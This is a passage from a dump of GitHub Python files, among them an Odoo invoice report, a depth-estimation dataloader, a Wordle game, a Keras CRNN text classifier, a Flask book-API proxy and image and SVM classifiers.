tweets!')\nplt.show()\n","repo_name":"jake-orielly/Getting_Started_with_Data_Science","sub_path":"midtermTwitter/tweetCount.py","file_name":"tweetCount.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37926311158","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\nfrom odoo import models, fields, api\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT\n\n\nclass FacturasPendientesReportWizard(models.TransientModel):\n _name = 'facturas_pendientes.report.wizard'\n\n date_start = fields.Date(string=\"Fecha Inicio\", null=True)\n date_end = fields.Date(string=\"Fecha Final\", null=True)\n partner_id = fields.Many2one('res.partner', string=\"Cliente\")\n\n @api.multi\n def get_report(self):\n data = {\n 'ids': self.ids,\n 'model': self._name,\n 'form': {\n 'date_start': self.date_start,\n 'date_end': self.date_end,\n 'partner_id': self.partner_id.id,\n },\n }\n\n return self.env.ref('facturas_pendientes_report.recap_report').report_action(self, data=data)\n\n\nclass ReportFacturasPendientes(models.AbstractModel):\n\n _name = 'report.facturas_pendientes_report.recap_report_view'\n\n @api.model\n def _get_report_values(self, docids, data=None):\n date_start = data['form']['date_start']\n date_end = data['form']['date_end']\n start_report=''\n end_report=''\n if date_start:\n date_start_obj = datetime.strptime(date_start, DATE_FORMAT)\n start_report = date_start_obj.strftime('%d/%m/%Y')\n if date_end:\n date_end_obj = datetime.strptime(date_end, DATE_FORMAT)\n end_report = date_end_obj.strftime('%d/%m/%Y')\n partner_id = data['form']['partner_id']\n\n # print(partner_id)\n\n if partner_id:\n if date_start and date_end:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('date_invoice', '>=', date_start_obj.strftime(DATETIME_FORMAT)),\n ('date_invoice', '<=', date_end_obj.strftime(DATETIME_FORMAT)),\n ('tax_line_ids', '!=', False)]).filtered(lambda x: x.partner_id.id == partner_id or x.partner_id.parent_id.id == partner_id)\n else:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('tax_line_ids', '!=', False)]).filtered(lambda x: x.partner_id.id == partner_id or x.partner_id.parent_id.id == partner_id)\n else:\n if date_start and date_end:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('date_invoice', '>=', date_start_obj.strftime(DATETIME_FORMAT)),\n ('date_invoice', '<=', date_end_obj.strftime(DATETIME_FORMAT)),\n ('tax_line_ids', '!=', False)])\n else:\n facturas = self.env['account.invoice'].search(\n [('type', '=', 'out_invoice'), ('state', 'in', ['open', 'in_payment']),\n ('tax_line_ids', '!=', False)])\n\n docs = sorted(facturas, key = lambda x: x.date_invoice)\n\n return {\n 'doc_ids': data['ids'],\n 'doc_model': data['model'],\n 'date_start':start_report,\n 'date_end': end_report,\n 'partner_id': partner_id,\n 'docs': docs,\n }\n","repo_name":"acostaw/erp_odoo","sub_path":"facturas_pendientes_report/models/facturas_pendientes.py","file_name":"facturas_pendientes.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5931564078","text":"# ------------------------------------------------------------------------------\n# The code is from GLPDepth (https://github.com/vinvino02/GLPDepth).\n# For non-commercial purpose only (research, evaluation etc).\n# ------------------------------------------------------------------------------\n\nimport os\nimport cv2\nfrom dataloaders.base_dataset import BaseDataset\nimport json\nimport scipy\nimport torch\nimport numpy as np\nimport random\n\n#f in mm\nbase_f=25e-3\ndef get_blur(s1,s2,f):\n blur=torch.abs(s2-s1)/s2/(s1-f)*(f**2)/(base_f**2)\n return blur\n\n#selected_dirs: what rgb directories are being selected : a list of indices of sorted dir names\nclass nyudepthv2(BaseDataset):\n def __init__(self, data_path, rgb_dir_list,depth_dir,\n is_train=True,is_blur=False, crop_size=(448, 576), scale_size=None):\n super().__init__(crop_size)\n\n print('crop_size:'+str(crop_size))\n if crop_size[0] > 480:\n scale_size = (int(crop_size[0]*640/480), crop_size[0])\n\n self.scale_size = scale_size\n self.is_train = is_train\n self.is_blur=is_blur\n self.data_path = os.path.join(data_path, 'nyu_depth_v2')\n # self.rgbpath=os.path.join(self.data_path,rgb_dir)\n self.depthpath=os.path.join(self.data_path,depth_dir)\n self.rgb_dir_list=rgb_dir_list\n # self.fdist=float(rgb_dir.split('_')[-1])\n # self.f=float(rgb_dir.split('_')[2])*1e-3\n for dirname in rgb_dir_list:\n splitvals=dirname.split('\\\\')\n #get last non empty string\n s_=[s for s in splitvals if len(s)>0]\n s=s_[-1]\n fdist=float(s.split('_')[4])\n f=float(s.split('_')[2])*1e-3\n print('rgb dir:'+str(s))\n print('fdist:'+str(fdist))\n print('f:'+str(f))\n \n #read scene names\n scene_path=os.path.join(self.data_path, 'scenes.mat')\n self.scenes=scipy.io.loadmat(scene_path)['scenes']\n\n #read splits\n splits_path=os.path.join(self.data_path, 'splits.mat')\n splits=scipy.io.loadmat(splits_path)\n if is_train:\n self.file_idx=list(splits['trainNdxs'][:,0])\n else:\n self.file_idx=list(splits['testNdxs'][:,0])\n\n self.image_path_list = []\n self.depth_path_list = []\n\n with open('nyu_class_list.json', 'r') as f:\n self.class_list = json.load(f)\n \n phase = 'train' if is_train else 'test'\n print(\"Dataset: NYU Depth V2\")\n print(\"# of %s images: %d\" % (phase, len(self.file_idx)))\n\n def __len__(self):\n return len(self.file_idx)\n\n def __getitem__(self, idx):\n\n num=self.file_idx[idx]\n #select an item from rgb_dir_list\n rgb_dir=random.choice(self.rgb_dir_list)\n splitvals=rgb_dir.split('\\\\')\n #get last non empty string\n s_=[s for s in splitvals if len(s)>0]\n s=s_[-1]\n #fdist in m\n fdist=float(s.split('_')[-1])\n #f in m\n f=float(s.split('_')[2])*1e-3\n \n # print('rgb dir:'+str(rgb_dir))\n # print('fdist:'+str(fdist))\n # print('f:'+str(f))\n # print('______')\n rgbpath=os.path.join(self.data_path,rgb_dir)\n gt_path=os.path.join(self.depthpath,(str(num)+\".png\"))\n img_path=os.path.join(rgbpath,(str(num)+\".png\"))\n scene_name=self.scenes[num-1][0][0][:-5]\n\n class_id = -1\n for i, name in enumerate(self.class_list):\n if name in scene_name:\n class_id = i\n break\n\n assert class_id >= 0\n\n image = cv2.imread(img_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n depth = cv2.imread(gt_path, cv2.IMREAD_UNCHANGED).astype('float32')\n\n if self.scale_size:\n image = cv2.resize(image, (self.scale_size[0], self.scale_size[1]))\n depth = cv2.resize(depth, (self.scale_size[0], self.scale_size[1]))\n \n if self.is_train:\n if self.is_blur==1:\n image,depth = self.augment_training_data_blur(image, depth)\n else:\n image,depth = self.augment_training_data(image, depth)\n else:\n image,depth = self.augment_test_data(image, depth)\n\n depth = depth / 1000.0 # convert in meters\n blur=get_blur(fdist,depth,f)\n\n return {'image': image, 'depth': depth, 'blur':blur, 'class_id': class_id,'fdist':fdist,'f':f}\n\n# for st_iter, sample_batch in enumerate(loader):\n# input_RGB = sample_batch['image']\n# depth_gt = sample_batch['depth']\n# class_id = sample_batch['class_id']\n# gt_blur = sample_batch['blur']\n# break\n\n# import matplotlib.pyplot as plt \n# gt_blur[gt_blur==-1]=0\n# b=(gt_blur.numpy())[0,:,:]\n# plt.imshow(b)\n# plt.show()\n\n# d=(depth_gt.numpy())[0,:,:]\n# plt.imshow(d)\n# plt.show()\n\ndef get_loader_stats(loader):\n print('getting NUY v2 stats...')\n xmin,xmax,xmean,count=100,0,0,0\n depthmin,depthmax,depthmean=100,0,0\n blurmin,blurmax,blurmean=100,0,0\n depthlist=torch.empty(0)\n for st_iter, sample_batch in enumerate(loader):\n input_RGB = sample_batch['image']\n depth_gt = sample_batch['depth']\n class_id = sample_batch['class_id']\n gt_blur = sample_batch['blur']\n\n xmin_=torch.min(input_RGB).cpu().item()\n if(xmin_xmax):\n xmax=xmax_\n xmean+=torch.mean(input_RGB).cpu().item()\n count+=1\n mask=depth_gt>0\n depth_gt=depth_gt[mask]\n t=torch.flatten(depth_gt)\n depthlist=torch.concat((depthlist,t),axis=0)\n depthmin_=torch.min(depth_gt).cpu().item()\n if(depthmin_depthmax):\n depthmax=depthmax_\n depthmean+=torch.mean(depth_gt).cpu().item()\n gt_blur=gt_blur[mask]\n blurmin_=torch.min(gt_blur).cpu().item()\n if(blurmin_blurmax):\n blurmax=blurmax_\n blurmean+=torch.mean(gt_blur).cpu().item()\n\n print('RGB min='+str(xmin))\n print('RGB max='+str(xmax))\n print('RGB mean='+str(xmean/count))\n\n print('depth min='+str(depthmin))\n print('depth max='+str(depthmax))\n print('depth mean='+str(depthmean/count))\n\n print('blur min='+str(blurmin))\n print('blur max='+str(blurmax))\n print('blur mean='+str(blurmean/count))\n return depthlist\n\n\n# data_path='D:\\\\data\\\\'\n# rgb_dir='refocused_f_25_fdist_2'\n# depth_dir='rawDepth'\n# is_blur=True\n# crop_size=(480,480)\n\n# train_dataset=nyudepthv2(data_path=data_path,rgb_dir=rgb_dir,depth_dir=depth_dir,crop_size=crop_size,is_blur=is_blur,is_train=True)\n# val_dataset=nyudepthv2(data_path=data_path,rgb_dir=rgb_dir,depth_dir=depth_dir,crop_size=crop_size,is_blur=is_blur,is_train=False)\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1,\n# num_workers=0,pin_memory=True)\n\n# val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1,\n# num_workers=0,pin_memory=True)\n\n# get_loader_stats(train_loader)\n\n\n# from configs.train_options import TrainOptions\n# from dataset.base_dataset import get_dataset\n# import torch\n\n# opt = TrainOptions()\n# args = opt.initialize().parse_args()\n# args.shift_window_test=True\n# args.flip_test=True\n\n# dataset_kwargs = {'dataset_name': args.dataset, 'data_path': args.data_path,'rgb_dir':args.rgb_dir, 'depth_dir':args.depth_dir,\n# 'selected_dirs':args.selected_dirs}\n# dataset_kwargs['crop_size'] = (args.crop_h, args.crop_w)\n\n# train_dataset = get_dataset(**dataset_kwargs,is_train=True)\n# # val_dataset = get_dataset(**dataset_kwargs, is_train=False)\n\n\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=1,pin_memory=True)\n# # val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=1,pin_memory=True)\n# loader=train_loader\n\n# get_loader_stats(loader)\n","repo_name":"sleekEagle/defocus_camind","sub_path":"source/dataloaders/nyudepthv2.py","file_name":"nyudepthv2.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32418880418","text":"from typing import List\n\n\nclass Solution:\n def makesquare_0(self, matchsticks: List[int]) -> bool:\n total_len = sum(matchsticks)\n if total_len % 4:\n return False\n matchsticks.sort(reverse=True)\n\n edges = [0] * 4\n def dfs(index):\n if index == len(matchsticks):\n return True\n for i in range(4):\n edges[i] += matchsticks[index]\n if edges[i] <= total_len // 4 and dfs(index+1):\n return True\n edges[i] -= matchsticks[index]\n return False\n\n return dfs(0)\n\n\n","repo_name":"Jooc/LeetCode","sub_path":"python-version/leetcode/Solution_473.py","file_name":"Solution_473.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40973322579","text":"import os\nfrom tkinter import filedialog\nimport tkinter as tk\nimport pandas as pd\n\ndef createnewFile(file, path, LabelNmbr):\n filename = file\n filename = filename.replace('.csv','')\n fileNmbr = 0\n filename =filename+\"-Label-\"+str(LabelNmbr)+'-'+str(fileNmbr)\n\n\n if(os.path.isfile(os.path.join(newpath,filename)+'.csv')): #Für den Fall, dass ein File bereits existiert, bzw. der Filename breits vergeben ist\n return\n\n\n '''\n #\n #Vielleicht ist das ja noch nützlich.\n #Generiert neue Filenames, bis es kein File mit dem aktullen Namen gibt. (Zählt die Variable fileNmbr hoch)\n #\n\n while(os.path.isfile(os.path.join(newpath,filename)+'.csv')):\n print('file name already exists')\n filename = filename[:-len(str(fileNmbr))]\n fileNmbr +=1\n filename = filename+str(fileNmbr) \n '''\n\n print('Creating File for Label: '+str(LabelNmbr))\n text_file = open(os.path.join(newpath, filename)+'.csv', \"w+\")\n text_file.write(\"time;Sensor Type;v1;v2;v3;Label\\n\")\n \n return text_file\n\ndef exportData(dirPath,file, newpath):\n\n\n fileLabel1 = createnewFile(file,newpath, 1)\n fileLabel2 = createnewFile(file,newpath, 2)\n fileLabel3 = createnewFile(file,newpath, 3)\n\n if (fileLabel1 is None) or (fileLabel2 is None) or (fileLabel3 is None):\n print('File wit name {} already exists! Aborting Mission.'.format(file))\n return\n\n\n contents = pd.read_csv(os.path.join(dirPath,file),delimiter=';')\n df = pd.DataFrame(contents, columns = ['time','Sensor Type','v1','v2','v3','Label'])\n for row in df.iterrows():\n\n Time =row[1]['time']\n SensorType =row[1]['Sensor Type']\n v1 =row[1]['v1']\n v2 =row[1]['v2']\n v3 =row[1]['v3']\n Label =row[1]['Label']\n\n if(row[1]['Label'] == 1):\n fileLabel1.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n elif(row[1]['Label'] == 2):\n fileLabel2.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n elif(row[1]['Label'] == 3):\n fileLabel3.write('{};{};{};{};{};{}\\n'.format(Time,SensorType,v1,v2,v3,Label))\n\nif __name__ == '__main__':\n\n root = tk.Tk()\n root.withdraw()\n currdir = os.getcwd()\n file_path = filedialog.askdirectory()\n newpath = os.path.join(file_path,'extractedData')\n print(file_path)\n print('newpath: {}'.format(newpath))\n\n if not os.path.exists(newpath):\n print('Creating new directory for Labels')\n os.makedirs(newpath)\n else:\n print('Directory already exists!')\n\n for file in os.listdir(file_path):\n if file.endswith('.csv'):\n print('Exporting Data from {}'.format(file))\n exportData(file_path, file, newpath)\n\n","repo_name":"cjmoeller/tug-server","sub_path":"dataExtractor.py","file_name":"dataExtractor.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"30580523804","text":"from tkinter import S\r\nimport emoji\r\n\r\ndef game(word = str):\r\n squareList = []\r\n gueses = 6\r\n print(\"WELCOME TO WORDLE\")\r\n print(\"The game is simple guess a word and press enter \\nif any letters in the word are correct the will show up with a green square \\nif theay are correct but in the wrong place a yellow \\nif wrong it will stay white \")\r\n print(\"you only get 6 gueses\")\r\n print(\"\")\r\n \r\n for i in range(len(word)):\r\n print(emoji.emojize(\" :red_square:\"), end = \"\")\r\n \r\n while (True):\r\n green = False\r\n yellow = False\r\n correct = False\r\n print(\"\\nenter your guess length is \",len(word))\r\n guess = input()\r\n \r\n if (guess == word):\r\n win(word)\r\n break\r\n elif (gueses < 7):\r\n for i in range(len(guess)):\r\n for j in range(len(word)):\r\n if (guess[i] == word[j] and i == j):\r\n green = True\r\n elif (guess[i] == word[j] and i != j):\r\n yellow = True\r\n \r\n if (green == True):\r\n print(emoji.emojize(\" :green_square:\"), end = \"\")\r\n green = False\r\n correct = True\r\n elif (yellow == True):\r\n print(emoji.emojize(\" :yellow_square:\"), end = \"\")\r\n yellow = False\r\n correct = True\r\n \r\n if (correct != True):\r\n print(emoji.emojize(\" :red_square:\"), end = \"\")\r\n else:\r\n correct = False\r\n \r\n else:\r\n loose(loose)\r\n break\r\n \r\n \r\ndef win(word = str):\r\n print(\"we done you have won the game\")\r\n for i in range(len(word)):\r\n print(emoji.emojize(\" :green_square:\"), end = \"\")\r\n\r\ndef loose():\r\n print(\"unlucky too many guesses\")\r\n \r\nif __name__ == \"__main__\":\r\n word = \"computing\"\r\n game(word)\r\n ","repo_name":"paddyyates7890/WordleGame","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16931531050","text":"# -*- coding: UTF-8 -*-\r\n# !/usr/bin/python\r\n# @time :2019/6/3 10:51\r\n# @author :Mo\r\n# @function :graph of CRNN\r\n# @paper :A C-LSTM Neural Network for Text Classification(https://arxiv.org/abs/1511.08630)\r\n\r\n\r\nfrom keras import regularizers\r\nfrom keras.models import Model\r\nfrom keras.layers import SpatialDropout1D, Conv1D\r\nfrom keras.layers import Dropout, Flatten, Dense, Concatenate\r\nfrom keras.layers import LSTM, GRU, Bidirectional, CuDNNLSTM, CuDNNGRU\r\n\r\nfrom keras_textclassification.base.graph import graph\r\n\r\n\r\nclass CRNNGraph(graph):\r\n def __init__(self, hyper_parameters):\r\n \"\"\"\r\n 初始化\r\n :param hyper_parameters: json,超参\r\n \"\"\"\r\n self.rnn_type = hyper_parameters['model'].get('rnn_type', 'LSTM')\r\n self.rnn_units = hyper_parameters['model'].get('rnn_units', 650) # large, small is 300\r\n self.dropout_spatial = hyper_parameters['model'].get('dropout_spatial', 0.2)\r\n self.l2 = hyper_parameters['model'].get('l2', 0.001)\r\n super().__init__(hyper_parameters)\r\n\r\n def create_model(self, hyper_parameters):\r\n \"\"\"\r\n 构建神经网络\r\n :param hyper_parameters:json, hyper parameters of network\r\n :return: tensor, moedl\r\n \"\"\"\r\n super().create_model(hyper_parameters)\r\n x = self.word_embedding.output\r\n embedding_output_spatial = SpatialDropout1D(self.dropout_spatial)(x)\r\n\r\n if self.rnn_units==\"LSTM\":\r\n layer_cell = LSTM\r\n elif self.rnn_units==\"GRU\":\r\n layer_cell = GRU\r\n elif self.rnn_units==\"CuDNNLSTM\":\r\n layer_cell = CuDNNLSTM\r\n elif self.rnn_units==\"CuDNNGRU\":\r\n layer_cell = CuDNNGRU\r\n else:\r\n layer_cell = GRU\r\n # CNN\r\n convs = []\r\n for kernel_size in self.filters:\r\n conv = Conv1D(self.filters_num,\r\n kernel_size=kernel_size,\r\n strides=1,\r\n padding='SAME',\r\n kernel_regularizer=regularizers.l2(self.l2),\r\n bias_regularizer=regularizers.l2(self.l2),\r\n )(embedding_output_spatial)\r\n convs.append(conv)\r\n x = Concatenate(axis=1)(convs)\r\n # Bi-LSTM, 论文中使用的是LSTM\r\n x = Bidirectional(layer_cell(units=self.rnn_units,\r\n return_sequences=True,\r\n activation='relu',\r\n kernel_regularizer=regularizers.l2(self.l2),\r\n recurrent_regularizer=regularizers.l2(self.l2)\r\n ))(x)\r\n x = Dropout(self.dropout)(x)\r\n x = Flatten()(x)\r\n # 最后就是softmax\r\n dense_layer = Dense(self.label, activation=self.activate_classify)(x)\r\n output = [dense_layer]\r\n self.model = Model(self.word_embedding.input, output)\r\n self.model.summary(120)\r\n","repo_name":"yongzhuo/Keras-TextClassification","sub_path":"keras_textclassification/m09_TextCRNN/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1634,"dataset":"github-code","pt":"48"} +{"seq_id":"21719825121","text":"from flask import Flask, request, jsonify\nimport requests\nimport json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app, origins='*')\n\nwith open(\"configfile.json\", \"r\") as config_file:\n config = json.load(config_file)\n book_api_url = config.get(\"book_api_url\")\n\n# Route to fetch all books from the book management application\n@app.route('/booksinfo', methods=['GET'])\ndef fetch_books():\n response = requests.get(f\"{book_api_url}/books\")\n if response.status_code == 200:\n books = response.json()\n return jsonify(books)\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to fetch a single book by ID from the book management application\n@app.route('/booksinfo/', methods=['GET'])\ndef fetch_book(book_id):\n response = requests.get(f\"{book_api_url}/books/{book_id}\")\n if response.status_code == 200:\n book = response.json()\n return jsonify(book)\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to add a new book to the book management application\n@app.route('/booksinfo', methods=['POST'])\ndef add_book():\n data = request.json\n response = requests.post(f\"{book_api_url}/books\", json=data)\n if response.status_code == 201:\n return jsonify({\"message\": \"Book added successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to update a book by ID in the book management application\n@app.route('/booksinfo/', methods=['PUT'])\ndef update_book(book_id):\n data = request.json\n response = requests.put(f\"{book_api_url}/books/{book_id}\", json=data)\n if response.status_code == 200:\n return jsonify({\"message\": \"Book updated successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\n# Route to delete a book by ID in the book management application\n@app.route('/booksinfo/', methods=['DELETE'])\ndef delete_book(book_id):\n response = requests.delete(f\"{book_api_url}/books/{book_id}\")\n if response.status_code == 200:\n return jsonify({\"message\": \"Book deleted successfully\"})\n else:\n return jsonify({\"error\": f\"Error: {response.status_code} - {response.json()}\"}), 500\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Mkking823/DevOps_Training","sub_path":"full_stack_pro_for BMS/Services/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"866272625","text":"# TODO : write doc\n# Author: John Holliman\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.datasets import load_svmlight_file, dump_svmlight_file\nfrom sklearn.cross_validation import train_test_split\n#from sklearn.svm import SVC\nfrom sknn.mlp import Classifier, Layer, Convolution\nfrom sklearn.preprocessing import MaxAbsScaler\nfrom sklearn.pipeline import Pipeline\nfrom scipy.misc import imread, imresize\nfrom time import time\nimport os\n\n################################################################################\n# Options\nim_dir = os.getcwd() + \"/images\"\nfundus_data_file = os.getcwd() + \"/data/fundus_dataset.svm\"\ntarget_names = np.array(['healthy', 'glaucoma', 'diabetic retinopathy'])\nscale_factor = 0.1\ntest_size = 0.2\ngamma = 0.0005\nkernel = 'poly'\ndegree = 3\n\n################################################################################\n# Load dataset (create it if necessary)\nprint(\"Loading dataset\")\nt0 = time()\nif not os.path.isfile(fundus_data_file):\n t1 = time()\n print(\"\\tGenerating dataset\")\n fundus_dataset = {}\n image_data = []\n target = []\n for fname in os.listdir(im_dir):\n # Load Image and transform to a 1D numpy array.\n im_fundus = imread(im_dir + \"/\" + fname)\n im_fundus = imresize(im_fundus, scale_factor)\n im_fundus = np.array(im_fundus, dtype=np.float64) / 255\n w, h, d = original_shape = tuple(im_fundus.shape)\n print(\"\\t\" + str(original_shape))\n assert d == 3\n im_fundus = np.reshape(im_fundus, (w * h * d))\n image_data.append(im_fundus)\n if 'h' in fname:\n target.append(0)\n elif 'g' in fname:\n target.append(1)\n else: # 'dr'\n target.append(2)\n print(\"\\t\" + fname)\n dump_svmlight_file(np.array(image_data), np.array(target), fundus_data_file)\n print(\"\\tDone in %0.3fs.\" % (time() - t1))\n\nimage_data, target = fundus_dataset = load_svmlight_file(fundus_data_file)\nprint(\"Done in %0.3fs.\" % (time() - t0))\nprint(\"Total dataset size:\")\nprint(\"n_samples: %d\" % target.shape[0])\nprint(\"n_features: %d\" % image_data.shape[1])\nprint(\"n_classes: %d\" % target_names.shape[0])\nprint(\"\")\n\n################################################################################\n# Split data into a training and a test set\n\nX_train, X_test, y_train, y_test = train_test_split(image_data, target,\n test_size=test_size, random_state=42)\n\n################################################################################\n# Extract features from the data\n\n# TODO\n\n################################################################################\n# Train NN\n\nx_tnew = []\nfor im in X_train:\n x_tnew.append(im.toarray().reshape((233,350,3)))\n\nx_testnew = []\nfor im in X_test:\n x_testnew.append(im.toarray().reshape((233,350,3)))\n\nX_train = np.array(x_tnew)\nX_test = np.array(x_testnew)\n\ncnn = Classifier(\n layers=[\n Convolution('Rectifier', channels=12, kernel_shape=(3, 3),\n border_mode='full', pool_shape=(2,2), pool_type='max'),\n Layer('Softmax')],\n learning_rate=0.001, \n n_iter=25,\n verbose=True)\nmm_scaler = MaxAbsScaler()\nnn_class= Classifier( \n layers=[\n Layer(\"Maxout\", units=100, pieces=2), \n Layer(\"Softmax\")], \n learning_rate=0.001, \n n_iter=25,\n verbose=True)\n\npipeline = Pipeline([\n ('min/max scaler', mm_scaler),\n ('neural network', nn_class)])\n\n################################################################################\n# Train SVM classification model\n\nprint(\"Fitting the classifier to the training set\")\nt2 = time()\nclassifier = cnn\nclassifier.fit(X_train, y_train)\nprint(\"Done in %0.3fs.\" % (time() - t2))\nprint(\"\")\n\n################################################################################\n# Predict values on test set and plot predictions\n\npredicted = classifier.predict(X_test)\n\nprint(\"Classification report for classifier %s:\\n%s\\n\"\n % (classifier, classification_report(y_test, predicted)))\nprint(\"Confusion matrix:\\n%s\" % confusion_matrix(y_test, predicted))\n\nfor index, prediction in enumerate(predicted):\n plt.subplot(3, 3, index + 1)\n plt.axis('off')\n image = X_test[index].toarray().reshape((233, 350, 3)) * 255\n #image = X_test[index] * 255\n image = np.array(image, dtype=np.uint8)\n plt.imshow(image)\n plt.title('Prediction: %s' % target_names[int(prediction)])\n\nplt.show()\n","repo_name":"jhh3/6.869-final-project","sub_path":"fundus_nn.py","file_name":"fundus_nn.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3089622117","text":"import data_cleaner\n\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\nsvc = SVC()\nkernels = {'poly', 'rbf', 'sigmoid'}\n\n\ndef define_model(n, kernel):\n return SVC(C=n, kernel=kernel)\n\n\ndef train_model(svc, x_train, y_train, scaler=None):\n if scaler is not None:\n x_train = scaler.fit_transform(x_train)\n svc.fit(x_train, y_train)\n\n\ndef get_scores(svc, x_test, scaler=None):\n if scaler is not None:\n x = scaler.transform(x_test)\n else:\n x = x_test\n return svc.decision_function(x)\n\n\ndef compute_roc_curve(y_test, y_scores):\n return roc_curve(y_test, y_scores)\n\n\ndef compute_auc(y_test, y_scores):\n return roc_auc_score(y_test, y_scores)\n\n\ndef get_max_auc(x_train, y_train, x_test, y_test, verbose=0):\n if verbose:\n fig, ax = plt.subplots()\n df_scores = pd.DataFrame(data=None, columns=['C', 'Kernel', 'AUC', 'Scaled'], )\n best_model = None\n best_auc = -1e31\n best_scaler = None\n minmax_scaler = MinMaxScaler()\n for c in np.arange(0.1, 5.1, 0.1):\n for kernel in ['poly', 'rbf', 'sigmoid']:\n for scaler in [None, minmax_scaler]:\n svc = define_model(c, kernel)\n train_model(svc, x_train, y_train, scaler)\n y_scores = get_scores(svc, x_test, scaler)\n fpr, tpr, threshold = compute_roc_curve(y_test, y_scores)\n auc = compute_auc(y_test, y_scores)\n if auc > best_auc:\n best_auc = auc\n best_model = svc\n best_scaler = scaler\n score_dict = {'C': c, 'Kernel': kernel, 'AUC': auc, 'Scaled': scaler}\n df_scores = df_scores.append(score_dict, ignore_index=True)\n if verbose:\n print(f'C:{c}, Kernel:{kernel}, AUC:{auc}, Scaled:{scaler}')\n ax.plot(fpr, tpr)\n\n if verbose:\n plt.xlabel('False Positive')\n plt.ylabel('True Positive')\n fig1 = plt.gcf()\n plt.show()\n fig1.savefig('trade_off.png')\n\n df_scores = df_scores.sort_values(by=['AUC'], ascending=False)\n return df_scores.iloc[0], best_model, best_scaler\n\n\ndef main():\n x_train, y_train, x_test, y_test = data_cleaner.clean_data('wdbc.pkl', 0.7)\n max_auc = get_max_auc(x_train, y_train, x_test, y_test)\n print(max_auc)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ribesstefano/chalmers_dat410_design_of_ai_systems","sub_path":"module5/src/svm_model.py","file_name":"svm_model.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2819349890","text":"def remove_duplicates():\n \"\"\"\nThis program reads words from user until the user enters\na blank line.\n\n@param: words(String). To enter the next word, hit return after the first.\n To stop data entry, hit return twice after the last word.\n@return: The list of words entered in the same sequence they were entered \n without duplicates.\n\"\"\"\n\n # Initialize state variables.\n list_of_words = list()\n\n # Read user input and add to list avoiding duplicates.\n while True:\n word = input(\"Enter a word or hit return to terminate: \")\n if word == '':break\n elif word not in list_of_words:\n list_of_words.append(word)\n\n return list_of_words\n\n\ndef main():\n # Display the output as per specification.\n words = remove_duplicates()\n print()\n for word in words:\n print(word)\n\n\nif __name__ == '__main__':\n main()","repo_name":"engrvitalis/BertelsmanProjects","sub_path":"remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7108915275","text":"import food_detection_root\nimport os\nimport codecs\nfrom time import time\nimport datetime\nfrom datetime import timedelta\n\nstart_time = time()\ndate = datetime.datetime.today().strftime(\"%Y_%m_%d-%H_%M_%S\")\npath_to_file = date + \" - EmojiSentimentListGeneration_Performance.txt\"\np_file = open(path_to_file, 'a')\np_file.write(date + \" Emoji Sentiment List Generation - Local Execution\" + \"\\n\")\np_file.flush()\n\npath = food_detection_root.ROOT_DIR + os.path.sep + 'data' + os.path.sep\nemoji_sentiment_list_file = codecs.open(path + \"list - emoji_sentiment_data.csv\", encoding='utf-8')\nemoji_sentiment_list = emoji_sentiment_list_file.read().splitlines()\nemoji_sentiment_list_file.close()\n\nunicode_emoji_list_file = codecs.open(path + \"list - 